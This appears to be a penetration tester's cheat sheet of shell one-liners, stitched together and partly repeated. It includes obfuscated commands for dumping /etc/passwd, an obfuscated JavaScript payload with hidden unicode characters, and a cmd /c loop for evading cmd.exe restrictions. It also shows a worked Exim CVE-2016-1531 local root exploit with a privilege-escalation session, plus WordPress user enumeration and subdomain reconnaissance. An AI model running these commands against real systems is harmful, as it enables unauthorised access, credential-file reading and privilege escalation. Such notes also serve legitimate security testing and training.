#Obfuscating calls to dump /etc/passwd
awk '1==1' </?t[Cc]/????wd
cd /etc;tr a a< p*wd
`sed 'ss:s|sg'
| []["filter"]["constructor"](unescape(escape('󠅡󠅬󠅥').replace(/u.{8}/g,'')))() |
| cat ciphertext.txt | tr ' ' '\n' | sort | uniq -c | awk '{print $1" "$2}' | column -c3 -s " " -t | sort -nr |
| wget -r -np -m -e robots=off --timeout=1 --tries=3 --retry-connrefused http://domain.tld |
| # thanks to - https://twitter.com/mwulftange/status/1034689855010353152 | |
| If you're not allowed to run cmd.exe interactively but `cmd /c …` works, this `cmd /c` based REPL may be helpful: | |
| cmd /c for /l %i in (0,0,1) do cmd /c "set /p C=^> & cmd /c %C%" |
| history | awk '{CMD[$2]++;count++;}END { for (a in CMD)print CMD[a] " " CMD[a]/count*100 "% " a; }' | grep -v "./" | column -c3 -s " " -t | sort -nr | nl | head -n20 |
#Obfuscating calls to dump /etc/passwd
awk '1==1' </?t[Cc]/????wd
cd /etc;tr a a< p*wd
`sed 'ss:s|sg'
Using Exim < 4.86.2 Local Root Privilege Escalation Exploit (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1531)
[user@server ~]$ whoami
admin
[user@server ~]$ id
uid=501(admin) gid=502(admin) groups=502(admin)
[user@server ~]$ PERL5OPT="-d/dev/null" /usr/sbin/exim -ps user@server
| examplesite.com/wp-json/wp/v2/users |
| # Grab from crt.sh | |
| echo "targetdomain.com" | xargs -I testdomain curl -s "https://crt.sh/?q=%.testdomain&output=json" | jq '.name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | |
| # Grab from certspotter.com | |
| echo "targetdomain.com" | xargs -I testdomain curl -s https://certspotter.com/api/v0/certs\?domain\=testdomain | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | |
| # Enumerate hosts from SSL Certificate | |
| echo | openssl s_client -connect https://targetdomain.com:443 | openssl x509 -noout -text | grep DNS |
| alias mygateway="print $(route -n | grep 'UG[ \t]' | awk '{print $2}')" | |
| alias myinterface="print $(route -n | grep 'UG[ \t]' | awk '{print $8}')" | |
| alias mysubnet="print $(ip -o -f inet addr show | awk '/scope global/ {print $4}')" |